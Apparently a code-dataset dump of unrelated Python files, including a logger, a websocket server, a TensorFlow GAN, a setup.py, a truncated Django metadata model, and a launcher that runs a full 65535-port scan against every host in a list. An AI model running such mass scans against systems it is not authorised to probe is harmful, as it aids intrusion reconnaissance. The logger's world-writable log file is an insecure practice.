"call"}, {"api_name": "wry.data_structures.WryDict", "line_number": 110, "usage_type": "call"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 126, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 129, "usage_type": "call"}, {"api_name": "wry.data_structures.WryDict", "line_number": 134, "usage_type": "call"}, {"api_name": "xml.etree", "line_number": 138, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 138, "usage_type": "call"}, {"api_name": "xml.etree", "line_number": 139, "usage_type": "argument"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 139, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 140, "usage_type": "call"}, {"api_name": "wry.exceptions.NonZeroReturn", "line_number": 143, "usage_type": "call"}, {"api_name": "wry.exceptions", "line_number": 143, "usage_type": "name"}]}
+{"seq_id": "451903719", "text": "import logging\nimport uvicorn\nimport pathlib\n\n\nclass logger_class:\n def __init__(self):\n self.logfile = \"test.log\"\n self.logger = logging.getLogger(\"uvicorn.access\")\n self.setup_logging()\n\n def setup_logging(self):\n logger = logging.getLogger(\"uvicorn.access\")\n console_formatter = uvicorn.logging.ColourizedFormatter(\n \"{asctime} {levelprefix} : {message}\",\n style=\"{\", use_colors=True)\n logger.handlers[0].setFormatter(console_formatter)\n logfile = pathlib.Path(self.logfile)\n logfile.touch()\n logfile.chmod(0o666)\n handler = logging.FileHandler(filename=self.logfile)\n handler.setFormatter(logging.Formatter(\n \"%(asctime)s %(levelname)8s : %(message)s\"))\n handler.setLevel(logging.WARN)\n logger.addHandler(handler)\n\n logger = logging.getLogger(\"uvicorn\")\n console_formatter = uvicorn.logging.ColourizedFormatter(\n \"{asctime} {levelprefix} : {message}\",\n style=\"{\", use_colors=True)\n logger.handlers[0].setFormatter(console_formatter)\n\n def error(self, message):\n self.logger.error(message)\n\n def info(self, message):\n self.logger.info(message)\n\n def debug(self, message):\n self.logger.debug(message)\n\n def warning(self, message):\n self.logger.warning(message)\n\n\nlogger = logger_class()\n", "sub_path": "app/internal/module/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 1400, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "uvicorn.logging.ColourizedFormatter", "line_number": 14, "usage_type": "call"}, {"api_name": "uvicorn.logging", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 24, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "uvicorn.logging.ColourizedFormatter", "line_number": 28, "usage_type": "call"}, {"api_name": "uvicorn.logging", "line_number": 28, "usage_type": "attribute"}]}
+{"seq_id": "130497964", "text": "# -*- coding:UTF-8 -*-\r\n#*********************************************\r\n#------->>>>>>Author:秋某人的傻逼 *\r\n#------->>>>>>Name:熊猫最爱皮卡丘 *\r\n#------->>>>>>Target: real-time port monitoring tool *\r\n#*********************************************\r\n\r\n\r\n#--------------------/ tool design notes /--------------------\r\n#1. kick off concurrent scanning\r\n#--------------------/ tool design notes /--------------------\r\n\r\n\r\nimport os\r\nimport glob\r\nimport datetime\r\nimport subprocess\r\n\r\nprint('---------------------------------------------')\r\nprint('欢迎使用端口实时监控工具,本工具版本号:V3.0')\r\nprint('---------------------------------------------')\r\n# pseudo-thread setting for IP scanning\r\nprint('本软件默认开启所有IP并发扫描!请控制IP数量或者升级服务器配置以免宕机')\r\nprint('支持线程是:1、3、5、15、17、51、85、255、257、771、1285、3855、4369、13107、21845,请不要输入错误!')\r\nthread = input('请输入端口扫描线程:')\r\nthread = int(thread)\r\n# 65535 is divisible by: 1, 3, 5, 15, 17, 51, 85, 255, 257, 771, 1285, 3855, 4369, 13107, 21845.\r\n# ------------------------\r\n# IP pseudo-concurrency: module that splits the 65535 ports\r\n# ------------------------\r\ndef ip_ct(thread):\r\n print('INFO: The Thread is ' + str(thread))\r\n Number = int(65535 / thread)\r\n print(Number)\r\n i = 1\r\n dirpath = 'ports/'\r\n # Check whether the path exists; if files exist inside, delete them; create the directory if it is missing\r\n if os.path.exists('ports'):\r\n if os.listdir('ports'):\r\n print('文件夹Ports已经存在,正在对文件进行清空...')\r\n for file in os.walk('ports'):\r\n print('os.walk返回对象' + str(file))\r\n for items in file[2]:\r\n print('目标文件:' + items)\r\n os.remove(dirpath + items)\r\n print(items + '| 文件已删除')\r\n else:\r\n print('Ports目录已存在,且无文件!')\r\n else:\r\n os.mkdir('ports')\r\n print('Ports目录生成成功!')\r\n # Split the 65535 ports by the requested thread count, write one port file per thread, then list the files\r\n while i <= thread:\r\n count_original = Number * (i - 1)\r\n count = Number * i\r\n print('当前是生成第' + str(i) + '个线程')\r\n for port in range(count_original, count):\r\n with open('ports/port_' + str(i) + '.txt', 'a+') as f:\r\n f.write(str(port))\r\n f.write('\\n')\r\n f.close()\r\n i += 1\r\n for filename in glob.glob(r'ports/*.txt'):\r\n print('文件:' + filename + '| 生成成功!')\r\n print('IP线程预分类模块完成!')\r\n # directory creation module\r\ndef mkdir():\r\n now = datetime.datetime.now()\r\n path = 'portscan_results/' + str(now.year) + '-' + str(now.month) + '-' + str(now.day)\r\n # strip leading spaces\r\n # path = path.strip()\r\n # strip the trailing \\ character\r\n # path = path.rstrip(\"\\\\\")\r\n isExists = os.path.exists(path)\r\n # check the result\r\n if not isExists:\r\n os.makedirs(path)\r\n print(path + ' 创建成功')\r\n return True\r\n else:\r\n print(path + ' 目录已存在')\r\n return False\r\nip_ct(thread)\r\nmkdir()\r\n\r\nfor ip in open('hosts.txt','r'):\r\n listfile = os.listdir('ports')\r\n len_listfile = len(listfile)\r\n for x in range(0,len_listfile):\r\n for port in open('ports/'+ listfile[x],'r'):\r\n subprocess.Popen(\"python ./Real_Time_Port_Scaner.py \" + ip.strip() + \" \" + port.strip())", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3613, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 41, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 45, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 87, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "137228570", "text": "from websocket_server import WebsocketServer, WebsocketClientBehavior\n\n# Called for every client connecting (after handshake)\ndef new_client(client, server):\n print(\"New client connected and was given id %d\" % client.id)\n server.send_message_to_all(\"Hey all, a new client has joined us\")\n\n# Called for every client disconnecting\ndef client_left(client, server):\n\tprint(\"Client(%d) disconnected\" % client.id)\n\n# Called when a client sends a message (can be overridden)\ndef message_received(client, server, message):\n\tif len(message) > 200:\n\t\tmessage = message[:200]+'..'\n\tprint(\"Client(%d) from %s said: %s\" % (client.id, client.origin, message))\n\n\n\nclass hdrBhv(WebsocketClientBehavior):\n '''\n Set a different behavior\n '''\n def on_text(self, msg):\n '''\n if the text sent through msg is in the request headers\n respond with that header.\n '''\n if msg in self.handler.headers:\n self.send_text(self.handler.headers[msg]);\n else:\n print('Client(%d) from %s said: %s' % (self.id, self.origin, msg));\n # on_text and on_open keeps with the same behavior\n\nclass revBhv(WebsocketClientBehavior):\n '''\n Set a different behavior\n '''\n def on_text(self, msg):\n '''\n respond with the reversed message, characters joined by dots.\n '''\n self.send_text('.'.join(msg[::-1]));\n # on_text and on_open keeps with the same behavior\n\nPORT=9001\nserver = WebsocketServer(PORT)\n# override the default behavior for clients connection to ws://host:PORT/hdr\nserver.behaviors['/headers'] = hdrBhv;\nserver.behaviors['/reverse'] = revBhv;\n\n# default handlers, will be called if the client connects to the server with a different address\nserver.set_fn_new_client(new_client)\nserver.set_fn_client_left(client_left)\nserver.set_fn_message_received(message_received)\nserver.run_forever()\n", "sub_path": "examples/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1826, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "websocket_server.WebsocketClientBehavior", "line_number": 20, "usage_type": "name"}, {"api_name": "websocket_server.WebsocketClientBehavior", "line_number": 35, "usage_type": "name"}, {"api_name": "websocket_server.WebsocketServer", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "171770051", "text": "import tensorflow as tf\nimport input_data\nimport numpy as np\nfrom PIL import Image\n\nbatch_size = 64\nz_dim = 100\nlearning_rate = 0.001\nbeta1 = 0.5\nepochs = 5000\n\n\ndef model_inputs(image_width, image_height, image_channels, z_dim):\n # Real image\n inputs_real = tf.placeholder(tf.float32, (None, image_width, image_height, image_channels), name='input_real')\n\n # input z\n\n inputs_z = tf.placeholder(tf.float32, (None, z_dim), name='input_z')\n\n # Learning rate\n learning_rate = tf.placeholder(tf.float32, name='lr')\n\n return inputs_real, inputs_z, learning_rate\n\n\ndef generator(input_z, out_channel_dim, is_train=True):\n with tf.variable_scope('generator', reuse=not is_train):\n x0 = tf.layers.dense(input_z, 4 * 4 * 512)\n x0 = tf.reshape(x0, (-1, 4, 4, 512))\n bn0 = tf.layers.batch_normalization(x0, training=is_train)\n relu0 = tf.nn.relu(bn0)\n\n # transposed convolution (deconvolution)\n x1 = tf.layers.conv2d_transpose(relu0, 256, 4, strides=1, padding='valid')\n bn1 = tf.layers.batch_normalization(x1, training=is_train)\n relu1 = tf.nn.relu(bn1)\n\n x2 = tf.layers.conv2d_transpose(relu1, 512, 3, strides=2, padding='same')\n bn2 = tf.layers.batch_normalization(x2, training=is_train)\n relu2 = tf.nn.relu(bn2)\n\n logits = tf.layers.conv2d_transpose(relu2, out_channel_dim, 3, strides=2, padding='same')\n out = tf.tanh(logits)\n\n return out\n\n\ndef discriminator(images, reuse=False):\n \"\"\"\n Create the discriminator network\n :param images: Tensor of input image(s)\n :param reuse: Boolean if the weights should be reused\n :return: Tuple of (tensor output of the discriminator, tensor logits of the discriminator)\n \"\"\"\n # TODO: Implement Function\n\n # scope here\n\n with tf.variable_scope('discriminator', reuse=reuse):\n alpha = 0.2 # leak relu coeff\n\n # drop out probability\n keep_prob = 0.8\n\n # input layer 28 * 28 * color channel\n x1 = tf.layers.conv2d(images, 128, 5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer(seed=2))\n # No batch norm here\n # leak relu here / alpha = 0.2\n relu1 = tf.maximum(alpha * x1, x1)\n # applied drop out here\n drop1 = tf.nn.dropout(relu1, keep_prob=keep_prob)\n # 14 * 14 * 128\n\n # Layer 2\n x2 = tf.layers.conv2d(drop1, 256, 5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer(seed=2))\n # employ batch norm here\n bn2 = tf.layers.batch_normalization(x2, training=True)\n # leak relu\n relu2 = tf.maximum(alpha * bn2, bn2)\n drop2 = tf.nn.dropout(relu2, keep_prob=keep_prob)\n\n # 7 * 7 * 256\n\n # Layer3\n x3 = tf.layers.conv2d(drop2, 512, 5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer(seed=2))\n bn3 = tf.layers.batch_normalization(x3, training=True)\n relu3 = tf.maximum(alpha * bn3, bn3)\n drop3 = tf.nn.dropout(relu3, keep_prob=keep_prob)\n # 4 * 4 * 512\n\n # Output\n # Flatten\n flatten = tf.reshape(relu3, (-1, 4 * 4 * 512))\n logits = tf.layers.dense(flatten, 1)\n # activation\n out = tf.nn.sigmoid(logits)\n\n return out, logits\n\n\ndef model_loss(input_real, input_z, out_channel_dim):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n # TODO: Implement Function\n\n g_model = generator(input_z, out_channel_dim, is_train=True)\n\n g_model1 = generator(input_z, out_channel_dim, is_train=False)\n\n d_model_real, d_logits_real = discriminator(input_real, reuse=False)\n\n d_model_fake, d_logits_fake = discriminator(g_model, reuse=True)\n\n ## add smooth here\n\n smooth = 0.1\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real,\n labels=tf.ones_like(d_model_real) * (1 - smooth)))\n\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_model_fake)))\n\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake,\n labels=tf.ones_like(d_model_fake)))\n\n d_loss = d_loss_real + d_loss_fake\n\n return d_loss, g_loss, g_model1\n\n\ndef model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n\n t_vars = tf.trainable_variables()\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n with tf.control_dependencies(update_ops):\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n return d_train_opt, g_train_opt\n\n\ndef train(epoch_count, batch_size, z_dim, learning_rate, beta1, data_shape):\n input_real, input_z, lr = model_inputs(data_shape[1], data_shape[2], data_shape[3], z_dim)\n d_loss, g_loss, g_out = model_loss(input_real, input_z, data_shape[-1])\n d_opt, g_opt = model_opt(d_loss, g_loss, learning_rate, beta1)\n steps = 0\n losses = []\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch_i in range(epoch_count):\n steps += 1\n batch = mnist.train.next_batch(batch_size)\n labels = batch[1]\n batch = batch[0]\n train_batch = []\n for index, label in enumerate(labels):\n if label[2] == 1:\n train_batch.append(batch[index])\n input_batch_size = len(train_batch)\n train_batch = np.array(train_batch)\n train_batch = np.reshape(train_batch, (-1, data_shape[1], data_shape[2], data_shape[3]))\n batch_z = np.random.uniform(-1, 1, size=(input_batch_size, z_dim))\n _ = sess.run(d_opt, feed_dict={input_real: train_batch, input_z: batch_z, lr: learning_rate})\n _ = sess.run(g_opt, feed_dict={input_real: train_batch, input_z: batch_z, lr: learning_rate})\n if steps % 10 == 0:\n train_loss_d = d_loss.eval({input_real: train_batch, input_z: batch_z})\n train_loss_g = g_loss.eval({input_real: train_batch, input_z: batch_z})\n\n losses.append((train_loss_d, train_loss_g))\n\n print(\"Epoch {}/{}...\".format(epoch_i + 1, epochs),\n \"Discriminator Loss: {:.4f}...\".format(train_loss_d),\n \"Generator Loss: {:.4f}\".format(train_loss_g))\n if steps % 100 == 0:\n img = g_out.eval({input_z: batch_z})\n img = img[-1] * 128 + 128\n img = img.astype(int)\n img = img[:, :, 0]\n im = Image.fromarray(img).convert('L')\n im.save(\"result_{}.png\".format(steps))\n # im.show()\n\n\nif __name__ == \"__main__\":\n train(epochs, batch_size, z_dim, learning_rate, beta1, [0, 28, 28, 1])\n", "sub_path": "GAN.py", "file_name": "GAN.py", "file_ext": "py", "file_size_in_byte": 7886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tensorflow.placeholder", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.tanh", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.maximum", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.maximum", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.maximum", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 127, "usage_type": "attribute"}, {"api_name": "tensorflow.ones_like", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros_like", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.ones_like", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.trainable_variables", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 156, "usage_type": "attribute"}, {"api_name": "tensorflow.control_dependencies", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 159, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 159, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 160, "usage_type": "attribute"}, {"api_name": "input_data.read_data_sets", "line_number": 171, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 203, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 203, "usage_type": "name"}]}
+{"seq_id": "348402502", "text": "#\n# Copyright (c) 2013, Prometheus Research, LLC\n# Released under MIT license, see `LICENSE` for details.\n#\n\n\nfrom setuptools import setup, find_packages\n\n\nNAME = \"Cogs\"\nVERSION = \"0.4.4\"\nDESCRIPTION = \"\"\"Toolkit for developing command-line utilities in Python\"\"\"\nLONG_DESCRIPTION = open('README', 'r').read()\nAUTHOR = \"\"\"Kirill Simonov (Prometheus Research, LLC)\"\"\"\nAUTHOR_EMAIL = \"xi@resolvent.net\"\nLICENSE = \"MIT\"\nURL = \"https://github.com/prometheusresearch/cogs\"\nDOWNLOAD_URL = \"http://pypi.python.org/pypi/Cogs\"\nCLASSIFIERS = [\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Utilities\",\n]\nPACKAGES = find_packages('src')\nPACKAGE_DIR = {'': 'src'}\nNAMESPACE_PACKAGES = ['cogs']\nINSTALL_REQUIRES = ['setuptools', 'PyYAML']\nENTRY_POINTS = {\n 'console_scripts': [\n 'cogs = cogs.run:main',\n ],\n 'cogs.extensions': [],\n}\nUSE_2TO3 = True\n\n\nsetup(name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=LICENSE,\n url=URL,\n download_url=DOWNLOAD_URL,\n classifiers=CLASSIFIERS,\n packages=PACKAGES,\n package_dir=PACKAGE_DIR,\n namespace_packages=NAMESPACE_PACKAGES,\n install_requires=INSTALL_REQUIRES,\n entry_points=ENTRY_POINTS,\n use_2to3=USE_2TO3)\n\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1621, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.find_packages", "line_number": 31, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "311162443", "text": "import json\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.contenttypes.fields import GenericRelation\n\nfrom mezzanine.pages.page_processors import processor_for\n\nfrom hs_core.models import BaseResource, ResourceManager\nfrom hs_core.models import resource_processor, CoreMetaData, AbstractMetaDataElement\nfrom hs_core.hydroshare.utils import get_resource_file_name_and_extension\n\n\n# Define original spatial coverage metadata info\nclass OriginalCoverage(AbstractMetaDataElement):\n PRO_STR_TYPES = (\n ('', '---------'),\n ('WKT String', 'WKT String'),\n ('Proj4 String', 'Proj4 String')\n )\n\n term = 'OriginalCoverage'\n \"\"\"\n _value field stores a json string. The content of the json is the box coverage info\n _value = \"{'northlimit':northernmost coordinate value,\n 'eastlimit':easternmost coordinate value,\n 'southlimit':southernmost coordinate value,\n 'westlimit':westernmost coordinate value,\n 'units:units applying to 4 limits (north, east, south & west),\n 'projection': name of the projection (optional)}\"\n \"\"\"\n _value = models.CharField(max_length=1024, null=True)\n projection_string_type = models.CharField(max_length=20, choices=PRO_STR_TYPES, null=True)\n projection_string_text = models.TextField(null=True, blank=True)\n datum = models.CharField(max_length=300, blank=True)\n\n class Meta:\n # OriginalCoverage element is not repeatable\n unique_together = (\"content_type\", \"object_id\")\n\n @property\n def value(self):\n return json.loads(self._value)\n\n @classmethod\n def create(cls, **kwargs):\n \"\"\"\n The '_value' subelement needs special processing. (Check if the 'value' includes the\n required information and convert 'value' dict as Json string to be the '_value'\n subelement value.) The base class create() can't do it.\n\n :param kwargs: the 'value' in kwargs should be a dictionary\n the '_value' in kwargs is a serialized json string\n \"\"\"\n value_arg_dict = None\n if 'value' in kwargs:\n value_arg_dict = kwargs['value']\n elif '_value' in kwargs:\n value_arg_dict = json.loads(kwargs['_value'])\n\n if value_arg_dict:\n # check that all the required sub-elements exist and create new original coverage meta\n for value_item in ['units', 'northlimit', 'eastlimit', 'southlimit', 'westlimit']:\n if value_item not in value_arg_dict:\n raise ValidationError(\"For original coverage meta, one or more bounding \"\n \"box limits or 'units' is missing.\")\n\n value_dict = {k: v for k, v in value_arg_dict.iteritems()\n if k in ('units', 'northlimit', 'eastlimit', 'southlimit',\n 'westlimit', 'projection')}\n\n value_json = json.dumps(value_dict)\n if 'value' in kwargs:\n del kwargs['value']\n kwargs['_value'] = value_json\n return super(OriginalCoverage, cls).create(**kwargs)\n else:\n raise ValidationError('Coverage value is missing.')\n\n @classmethod\n def update(cls, element_id, **kwargs):\n \"\"\"\n The '_value' subelement needs special processing. (Convert 'value' dict as Json string\n to be the '_value' subelement value) and the base class update() can't do it.\n\n :param kwargs: the 'value' in kwargs should be a dictionary\n \"\"\"\n\n ori_cov = OriginalCoverage.objects.get(id=element_id)\n if 'value' in kwargs:\n value_dict = ori_cov.value\n\n for item_name in ('units', 'northlimit', 'eastlimit', 'southlimit',\n 'westlimit', 'projection'):\n if item_name in kwargs['value']:\n value_dict[item_name] = kwargs['value'][item_name]\n\n value_json = json.dumps(value_dict)\n del kwargs['value']\n kwargs['_value'] = value_json\n super(OriginalCoverage, cls).update(element_id, **kwargs)\n\n\n# Define netCDF variable metadata\nclass Variable(AbstractMetaDataElement):\n # variable types are defined in OGC enhanced_data_model_extension_standard\n # left is the given value stored in database right is the value for the drop down list\n VARIABLE_TYPES = (\n ('Char', 'Char'), # 8-bit byte that contains uninterpreted character data\n ('Byte', 'Byte'), # integer(8bit)\n ('Short', 'Short'), # signed integer (16bit)\n ('Int', 'Int'), # signed integer (32bit)\n ('Float', 'Float'), # floating point (32bit)\n ('Double', 'Double'), # floating point(64bit)\n ('Int64', 'Int64'), # integer(64bit)\n ('Unsigned Byte', 'Unsigned Byte'),\n ('Unsigned Short', 'Unsigned Short'),\n ('Unsigned Int', 'Unsigned Int'),\n ('Unsigned Int64', 'Unsigned Int64'),\n ('String', 'String'), # variable length character string\n ('User Defined Type', 'User Defined Type'), # compound, vlen, opaque, enum\n ('Unknown', 'Unknown')\n )\n term = 'Variable'\n # required variable attributes\n name = models.CharField(max_length=1000)\n unit = models.CharField(max_length=1000)\n type = models.CharField(max_length=1000, choices=VARIABLE_TYPES)\n shape = models.CharField(max_length=1000)\n # optional variable 